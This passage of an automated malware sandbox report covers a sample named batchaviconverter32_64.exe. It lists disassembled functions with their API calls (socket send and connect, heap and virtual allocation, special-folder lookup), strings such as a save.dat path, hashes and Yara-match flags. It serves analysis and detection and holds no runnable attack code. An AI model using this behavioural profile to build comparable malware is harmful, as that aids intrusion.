                                                              • Opcode Fuzzy Hash: ade2e129719512a706aeac876f0a8c01095c6a06ec5d81e25aee3eb1febfb5f9
                                                              • Instruction Fuzzy Hash: 1D416B710142985EEB169714CE59FEB3FE8EB02704F1404F6DA49F61D2C2794924DBBB
                                                              Function 02D82DB5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 02D82D39: WSASetLastError.WS2_32(00000000), ref: 02D82D47
                                                                • Part of subcall function 02D82D39: WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02D82D5C
                                                              • WSASetLastError.WS2_32(00000000), ref: 02D82E6D
                                                              • select.WS2_32(?,00000000,00000001,00000000,00000000), ref: 02D82E83
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLast$Sendselect
                                                              • String ID: 3'
                                                              • API String ID: 2958345159-280543908
                                                              • Opcode ID: 58a7c0928307a553672228ad508ee9754844e318d640bd3d8e6f632988e53b26
                                                              • Instruction ID: d11de0eb791b53a46f08eb9ea13ca1b7af7eb19da83be46b737d4e44b719a055
                                                              • Opcode Fuzzy Hash: 58a7c0928307a553672228ad508ee9754844e318d640bd3d8e6f632988e53b26
                                                              • Instruction Fuzzy Hash: 62319AB5A002499BDF11EFA4D848BEEBBAAEF04314F00455AEC4997340F7749D55CBE0
                                                              Function 02D8959B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 78networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WSASetLastError.WS2_32(00000000,?,?,?,?,?,?,?,02D88305,?,?,00000000), ref: 02D89602
                                                              • getsockname.WS2_32(?,?,?), ref: 02D89618
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLastgetsockname
                                                              • String ID: &'
                                                              • API String ID: 566540725-655172784
                                                              • Opcode ID: 26ba90ce91650b4fc60d029b0ddc148eeae75404b74a52f59c22a8d8d4ed93bb
                                                              • Instruction ID: 6bb22408f82bafbea01824c10a74a18764bedf57d268a384d88d9b7080a00574
                                                              • Opcode Fuzzy Hash: 26ba90ce91650b4fc60d029b0ddc148eeae75404b74a52f59c22a8d8d4ed93bb
                                                              • Instruction Fuzzy Hash: 20218E76A042489BDB10EF68D844ADEB7F5FF4C320F11816AE918EB380D730ED458BA0
                                                              Function 02D8CCD6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 02D8CCDB
                                                                • Part of subcall function 02D8D299: std::exception::exception.LIBCMT ref: 02D8D2C6
                                                                • Part of subcall function 02D8DAAF: __EH_prolog.LIBCMT ref: 02D8DAB4
                                                                • Part of subcall function 02D93A7C: _malloc.LIBCMT ref: 02D93A94
                                                                • Part of subcall function 02D8D2F6: __EH_prolog.LIBCMT ref: 02D8D2FB
                                                              Strings
                                                              • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void), xrefs: 02D8CD11
                                                              • C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 02D8CD18
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: H_prolog$_mallocstd::exception::exception
                                                              • String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void)
                                                              • API String ID: 1953324306-412195191
                                                              • Opcode ID: 448fed499c0b35a47d095581c5cf5a25e280bf4e8c6750a3a1ebfc8f6f0fd46d
                                                              • Instruction ID: dd492f7e6d36d9818c7ff9bc1ba6c5297752fb9bf065c8bc06fca53c3cc8d02f
                                                              • Opcode Fuzzy Hash: 448fed499c0b35a47d095581c5cf5a25e280bf4e8c6750a3a1ebfc8f6f0fd46d
                                                              • Instruction Fuzzy Hash: 94219C71E04248DBDB18FFE8D464AAEBBB6EF54704F044549E806A7380DB709E44CBA1
                                                              Function 02D82AC7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WSASetLastError.WS2_32(00000000), ref: 02D82AEA
                                                              • connect.WS2_32(?,?,?), ref: 02D82AF5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLastconnect
                                                              • String ID: 3'
                                                              • API String ID: 374722065-280543908
                                                              • Opcode ID: ce0ca0f957c953e40319e31f5466b4422454a57d0317b9465b6f1de4ff926547
                                                              • Instruction ID: 9f5e71a90639d0214e362de1e47cbdfee181d2e71a78a0798645f2494f8dd2a3
                                                              • Opcode Fuzzy Hash: ce0ca0f957c953e40319e31f5466b4422454a57d0317b9465b6f1de4ff926547
                                                              • Instruction Fuzzy Hash: E1219575E04244ABDF10BFA4D408ABEBBBAEF44325F108559EC1997380DB749E059FA1
                                                              Function 02D8534D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _malloc.LIBCMT ref: 02D8535D
                                                                • Part of subcall function 02D92EDC: __FF_MSGBANNER.LIBCMT ref: 02D92EF3
                                                                • Part of subcall function 02D92EDC: __NMSG_WRITE.LIBCMT ref: 02D92EFA
                                                                • Part of subcall function 02D92EDC: RtlAllocateHeap.NTDLL(00730000,00000000,00000001), ref: 02D92F1F
                                                              • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000023,00000000), ref: 02D8536F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateFolderHeapPathSpecial_malloc
                                                              • String ID: \save.dat
                                                              • API String ID: 4128168839-3580179773
                                                              • Opcode ID: 042bc3f97846d91b61d37ce8d6df41ff7a2721ff52cfb2f587773f475faa04d3
                                                              • Instruction ID: b2dccf62dd1384845191702a782123ca1600bd4303aa57b8d87c5293e2f47e0c
                                                              • Opcode Fuzzy Hash: 042bc3f97846d91b61d37ce8d6df41ff7a2721ff52cfb2f587773f475faa04d3
                                                              • Instruction Fuzzy Hash: 7D115C729042447BDF259E659C90E6FFFABDF83650F5501E9F88567701D6A20D02C6B0
                                                              Function 00403351 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe,00000104,?,00000000,?,?,?,?,00402DEE), ref: 00403374
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: FileModuleName
                                                              • String ID: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe$5s
                                                              • API String ID: 514040917-3481735834
                                                              • Opcode ID: 4b8fbbe1edf07751b100c16af9a753027d93dae450da557b14ba1428fad57fc3
                                                              • Instruction ID: 9914cd9322f57819df26321eb5c0d5781e1a9b7dbf92489965342876274e8e32
                                                              • Opcode Fuzzy Hash: 4b8fbbe1edf07751b100c16af9a753027d93dae450da557b14ba1428fad57fc3
                                                              • Instruction Fuzzy Hash: 7E113DB2900218BFC711EF99D9C5C9B7BACEB44358B0000BAF905A7281DA759E558BA9
                                                              Function 02D83965 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 02D8396A
                                                              • std::runtime_error::runtime_error.LIBCPMT ref: 02D839C1
                                                                • Part of subcall function 02D81410: std::exception::exception.LIBCMT ref: 02D81428
                                                                • Part of subcall function 02D8A550: __EH_prolog.LIBCMT ref: 02D8A555
                                                                • Part of subcall function 02D8A550: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02D8A564
                                                                • Part of subcall function 02D8A550: __CxxThrowException@8.LIBCMT ref: 02D8A583
                                                              Strings
                                                              • Day of month is not valid for year, xrefs: 02D839AC
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: H_prolog$Concurrency::cancellation_token::_Exception@8FromImplThrowstd::exception::exceptionstd::runtime_error::runtime_error
                                                              • String ID: Day of month is not valid for year
                                                              • API String ID: 1404951899-1521898139
                                                              • Opcode ID: eff93f4136ffd35f5988614ff0ef9c1486da3544e489f7bfc14e2a1a6f5c84bb
                                                              • Instruction ID: 31108e1fdb49c747a3e0015c7eb641cb804a2c9397a53a2f80da792e81e61de3
                                                              • Opcode Fuzzy Hash: eff93f4136ffd35f5988614ff0ef9c1486da3544e489f7bfc14e2a1a6f5c84bb
                                                              • Instruction Fuzzy Hash: 8101B17A810209AEDF04FFA4D805AEEB7B9FF14710F40405AEC04A3340EB748E55CBA5
                                                              Function 02D8B032 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • std::exception::exception.LIBCMT ref: 02D8FA49
                                                              • __CxxThrowException@8.LIBCMT ref: 02D8FA5E
                                                                • Part of subcall function 02D93A7C: _malloc.LIBCMT ref: 02D93A94
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Exception@8Throw_mallocstd::exception::exception
                                                              • String ID: bad allocation
                                                              • API String ID: 4063778783-2104205924
                                                              • Opcode ID: c3a8c4ab630db4580771d6df0c36e92a1d4486f7882917bc170555dd41f64c3f
                                                              • Instruction ID: 903ba5c17598d471ae98cd5ef0c4902f03cebf9107ede912a9bd944d21b152f6
                                                              • Opcode Fuzzy Hash: c3a8c4ab630db4580771d6df0c36e92a1d4486f7882917bc170555dd41f64c3f
                                                              • Instruction Fuzzy Hash: 35F0AE7060830DAADF04F6A898559BF73FDEB05714F500556F521E3780EBB0EE04C5A5
                                                              Function 02D83C16 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 02D83C1B
                                                              • std::bad_exception::bad_exception.LIBCMT ref: 02D83C30
                                                                • Part of subcall function 02D923E7: std::exception::exception.LIBCMT ref: 02D923F1
                                                                • Part of subcall function 02D8A589: __EH_prolog.LIBCMT ref: 02D8A58E
                                                                • Part of subcall function 02D8A589: __CxxThrowException@8.LIBCMT ref: 02D8A5B7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                              • String ID: bad cast
                                                              • API String ID: 1300498068-3145022300
                                                              • Opcode ID: 3889cc47b8cc4a9e18445dc5385b4d1eb76ded0b10a960119149411232da9017
                                                              • Instruction ID: 046fccec2dc0790d414d398d2078c31339a406e621a652c3ee84125aeebad65a
                                                              • Opcode Fuzzy Hash: 3889cc47b8cc4a9e18445dc5385b4d1eb76ded0b10a960119149411232da9017
                                                              • Instruction Fuzzy Hash: 7BF0A072D00504DBCB09EF58E450AEAB776EF51321F5040AEED055B350CB729E4ACAA1
                                                              Function 02D838CD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 02D838D2
                                                              • std::runtime_error::runtime_error.LIBCPMT ref: 02D838F1
                                                                • Part of subcall function 02D81410: std::exception::exception.LIBCMT ref: 02D81428
                                                                • Part of subcall function 02D888BE: _memmove.LIBCMT ref: 02D888DE
                                                              Strings
                                                              • Year is out of valid range: 1400..10000, xrefs: 02D838E0
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                              • String ID: Year is out of valid range: 1400..10000
                                                              • API String ID: 3258419250-2344417016
                                                              • Opcode ID: ba6e559eb08ed25a8887231a411894cf9208a1523a1084df71ad019767a510ca
                                                              • Instruction ID: 4d7547c9ebe1c38d60821e9f1e1f413c397821e09ec9712db3040baab513adca
                                                              • Opcode Fuzzy Hash: ba6e559eb08ed25a8887231a411894cf9208a1523a1084df71ad019767a510ca
                                                              • Instruction Fuzzy Hash: 2AE092B2E401049BE714FB989821FDDB775EB48720F40044AE801A7780DAB51D04CBA5
                                                              Function 02D83881 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 02D83886
                                                              • std::runtime_error::runtime_error.LIBCPMT ref: 02D838A5
                                                                • Part of subcall function 02D81410: std::exception::exception.LIBCMT ref: 02D81428
                                                                • Part of subcall function 02D888BE: _memmove.LIBCMT ref: 02D888DE
                                                              Strings
                                                              • Day of month value is out of range 1..31, xrefs: 02D83894
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                              • String ID: Day of month value is out of range 1..31
                                                              • API String ID: 3258419250-1361117730
                                                              • Opcode ID: 4096fa0e702a4b78002a82d5664e544ba9685de531e654677c6594698948e709
                                                              • Instruction ID: c97ff0cf5ca6de5f8121d1dcb7760929a556326be95c3456c23fec495abd7d70
                                                              • Opcode Fuzzy Hash: 4096fa0e702a4b78002a82d5664e544ba9685de531e654677c6594698948e709
                                                              • Instruction Fuzzy Hash: 80E0D8B2E001049BE714BF98D821FDDB775EB48B20F40004EE801B3780DAB51D048BE5
                                                              Function 02D83919 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 02D8391E
                                                              • std::runtime_error::runtime_error.LIBCPMT ref: 02D8393D
                                                                • Part of subcall function 02D81410: std::exception::exception.LIBCMT ref: 02D81428
                                                                • Part of subcall function 02D888BE: _memmove.LIBCMT ref: 02D888DE
                                                              Strings
                                                              • Month number is out of range 1..12, xrefs: 02D8392C
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                              • String ID: Month number is out of range 1..12
                                                              • API String ID: 3258419250-4198407886
                                                              • Opcode ID: 85e817aa4684be7804780b7adc655b62c099caec3004e427df13cf76f8651021
                                                              • Instruction ID: dc8a896479898f262e96dc87bbc5291080cdb4a5be4c3d10dec82fcfd4286664
                                                              • Opcode Fuzzy Hash: 85e817aa4684be7804780b7adc655b62c099caec3004e427df13cf76f8651021
                                                              • Instruction Fuzzy Hash: 59E0D872E001089FE714BF98D821FDDB775EB08720F50044EE801B3780DAB51D048BE5
                                                              Function 02D819C2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • TlsAlloc.KERNEL32 ref: 02D819CC
                                                              • GetLastError.KERNEL32 ref: 02D819D9
                                                                • Part of subcall function 02D81712: __EH_prolog.LIBCMT ref: 02D81717
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocErrorH_prologLast
                                                              • String ID: tss
                                                              • API String ID: 249634027-1638339373
                                                              • Opcode ID: 126c88881554d620f5afd6a9047d41897ae15fbd6e3ffcafe4a7e209f8fa993c
                                                              • Instruction ID: 6702a92085f578eaa8b93832a30d104f9bab30077b00702ffa7f76e3af2b8962
                                                              • Opcode Fuzzy Hash: 126c88881554d620f5afd6a9047d41897ae15fbd6e3ffcafe4a7e209f8fa993c
                                                              • Instruction Fuzzy Hash: F3E04F329042105B87007A78E80949BBBA4DA40231F108B6AECAD833D0EA308D158ADA
                                                              Function 02D83BD3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 02D83BD8
                                                              • std::bad_exception::bad_exception.LIBCMT ref: 02D83BED
                                                                • Part of subcall function 02D923E7: std::exception::exception.LIBCMT ref: 02D923F1
                                                                • Part of subcall function 02D8A589: __EH_prolog.LIBCMT ref: 02D8A58E
                                                                • Part of subcall function 02D8A589: __CxxThrowException@8.LIBCMT ref: 02D8A5B7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                              • String ID: bad cast
                                                              • API String ID: 1300498068-3145022300
                                                              • Opcode ID: b4b119d0b52db7fac34a33c59354123632c2b2eca481010554a0ff27f061d9c8
                                                              • Instruction ID: 6d6f09aa410db0e843c566ef7cde7162f9a9bcdc1752e3e1da81b4607489b6a8
                                                              • Opcode Fuzzy Hash: b4b119d0b52db7fac34a33c59354123632c2b2eca481010554a0ff27f061d9c8
                                                              • Instruction Fuzzy Hash: DEE01A71900108DBC704EF94E555BA9B771EB54311F4080ADE80657790CB359D59CAA5
                                                              Function 0040446C Relevance: 5.1, APIs: 4, Instructions: 53memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • HeapReAlloc.KERNEL32(00000000,00000050,?,00000000,00404234,?,?,?,00000100,?,00000000), ref: 00404494
                                                              • HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,00404234,?,?,?,00000100,?,00000000), ref: 004044C8
                                                              • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,00404234,?,?,?,00000100,?,00000000), ref: 004044E2
                                                              • HeapFree.KERNEL32(00000000,?,?,00000000,00404234,?,?,?,00000100,?,00000000), ref: 004044F9
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: AllocHeap$FreeVirtual
                                                              • String ID:
                                                              • API String ID: 3499195154-0
                                                              • Opcode ID: 03264f3b7f6a3c24648121467edc173d78a87d9b85cb2d8b679f40e74ce8d20c
                                                              • Instruction ID: 6532d2b8740b88ca5c68c93f46193dcc45771cdeba7f909f778517217a69801f
                                                              • Opcode Fuzzy Hash: 03264f3b7f6a3c24648121467edc173d78a87d9b85cb2d8b679f40e74ce8d20c
                                                              • Instruction Fuzzy Hash: 02113670200301AFC731CF29EE45A627BB5FB847207104A3AF252E65F0D775A866EF19